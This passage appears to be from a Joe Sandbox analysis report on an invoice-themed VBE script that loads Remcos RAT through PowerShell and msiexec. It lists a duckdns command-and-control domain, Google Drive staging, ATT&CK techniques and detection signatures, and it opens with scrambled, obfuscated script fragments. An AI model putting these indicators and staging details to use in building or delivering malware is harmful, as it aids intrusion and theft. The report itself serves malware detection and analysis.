ldeodegreewleccg udpieai,bilind sslittlesnobs ');sibs (kolonnetypernes 'beska$subspg egoil rochoek,tebassora .ortlpint :a drokgidserre evasymphmtelefmmic.oe pyronvaretdl bane flde=h nga$jell ademurplogicht eera inergsttteispiriapolys..ntagsheedhparvealtr boihjesttbe nd(addit$m uthmomklaefintelagilma tetrefortan mecha dyre) t er ');sibs (kolonnetypernes ' .all[ datancykrmeg,nert fib .svrmesstr be sutlr ,armvhududiudmalckopule.lycgptr inofastiicanonnforsttbrac.m brydacontrnm teraecholgnonadesc riryells]whitt:downc:ankomsdojigebist cchiolustatsrweddii spdbtnonsey,pkkepkontrr spu ohegnstpro,roraketcg.ngeotempul.loug burre=outwi vele [sejltnavahiekommutisopy.datamssv,neesvindcmundau cr mr se si subptafvigymtloopomnibrrun kofieultf mdoobjrnecaphidolumbeltrkJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5376, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5376, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		11
              Scripting              		111
              Process Injection              		1
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)111
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522517 Sample: Faktura_82666410_1361590461... Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 25 drive.usercontent.google.com 2->25 27 drive.google.com 2->27 37 Multi AV Scanner detection for domain / URL 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 7 other signatures 2->43 8 wscript.exe 1 2->8         started        11 powershell.exe 15 2->11         started        13 msiexec.exe 2->13         started        signatures3 process4 signatures5 45 Suspicious powershell command line found 8->45 47 Wscript starts Powershell (via cmd or directly) 8->47 49 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->49 51 Suspicious execution chain found 8->51 15 powershell.exe 14 20 8->15         started        53 Writes to foreign memory regions 11->53 55 Found suspicious powershell code related to unpacking or dynamic code loading 11->55 19 msiexec.exe 6 11->19         started        21 conhost.exe 11->21         started        process6 dnsIp7 29 drive.google.com 142.250.185.142, 443, 49730, 49731 GOOGLEUS United States 15->29 31 drive.usercontent.google.com 216.58.206.65, 443, 49732, 51426 GOOGLEUS United States 15->31 33 Found suspicious powershell code related to unpacking or dynamic code loading 15->33 23 conhost.exe 15->23         started        35 Detected Remcos RAT 19->35 signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Faktura_82666410_1361590461#U00b7pdf.vbe3%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              drive.google.com0%VirustotalBrowse
              drive.usercontent.google.com1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              http://drive.google.com0%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse
              https://drive.usercontent.google.com/1%VirustotalBrowse
              a458386d9.duckdns.org14%VirustotalBrowse
              https://www.google.com0%VirustotalBrowse
              http://drive.usercontent.google.com1%VirustotalBrowse
              https://drive.google.com/0%VirustotalBrowse
              https://drive.usercontent.google.com1%VirustotalBrowse
              https://drive.google.com0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              		142.250.185.142
              		truefalseunknown
              drive.usercontent.google.com
              		216.58.206.65
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              a458386d9.duckdns.orgtrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://drive.usercontent.google.compowershell.exe, 00000001.00000002.2070849929.000001E569785000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://drive.google.com/6msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://drive.usercontent.google.com:PSGPpowershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://go.micropowershell.exe, 00000001.00000002.2070849929.000001E568862000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://drive.googPpowershell.exe, 00000001.00000002.2070849929.000001E569698000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://drive.usercontent.googhpowershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://drive.usercontent.google.com/msiexec.exe, 00000008.00000002.2452849140.00000000046D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2435697705.00000000046E3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://drive.google.compowershell.exe, 00000001.00000002.2070849929.000001E5698D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://www.google.compowershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://drive.google.com/msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://aka.ms/pscore6lBfqpowershell.exe, 00000006.00000002.2456593952.0000000004921000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://contoso.com/powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://drive.google.compowershell.exe, 00000001.00000002.2070849929.000001E5698D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://drive.usercontent.google.compowershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569BA9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://aka.ms/pscore68powershell.exe, 00000001.00000002.2070849929.000001E5679C1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://apis.google.compowershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2070849929.000001E5679C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2456593952.0000000004921000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        142.250.185.142
                        		drive.google.comUnited States
                        		15169GOOGLEUSfalse
                        216.58.206.65
                        		drive.usercontent.google.comUnited States
                        		15169GOOGLEUSfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1522517
                        Start date and time:2024-09-30 09:56:14 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 40s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:13
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Faktura_82666410_1361590461#U00b7pdf.vbe
                        renamed because original name is a hash value
                        Original Sample Name:Faktura_82666410_1361590461pdf.vbe
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winVBE@9/7@2/2
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 65%
                        • Number of executed functions: 31
                        • Number of non-executed functions: 14
                        Cookbook Comments:
                        • Found application associated with file extension: .vbe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target msiexec.exe, PID 5376 because there are no executed function
                        • Execution Graph export aborted for target powershell.exe, PID 3020 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 5728 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        03:57:29API Interceptor112x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eUrgent Quotation Notification_pdf.vbsGet hashmaliciousUnknownBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        http://hrlaw.com.auGet hashmaliciousUnknownBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        file.exeGet hashmaliciousUnknownBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        file.exeGet hashmaliciousUnknownBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        CAPE MARS VSL'S PARTICULARS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        MV TASOS Vessel's Details.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        https://okfun188.com/Get hashmaliciousUnknownBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        https://mukirecords.com/Get hashmaliciousUnknownBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        https://thepeaceapproach.net/Get hashmaliciousUnknownBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        SecuriteInfo.com.Win32.BackdoorX-gen.13984.32209.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeGet hashmaliciousUnknownBrowse
                        • 142.250.185.142
                        • 216.58.206.65
                        SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeGet hashmaliciousUnknownBrowse
                        • 142.250.185.142
                        • 216.58.206.65

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):11608
                        Entropy (8bit):4.8908305915084105
                        Encrypted:false
                        SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                        MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                        SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                        SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                        SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1940658735648508
                        Encrypted:false
                        SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                        MD5:DA1F22117B9766A1F0220503765A5BA5
                        SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                        SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                        SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:@...e.................................R..............@..........

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdpbnqc2.4i3.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfmeozqa.3ww.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2ws2ubf.ccr.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3w3pvjg.gej.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
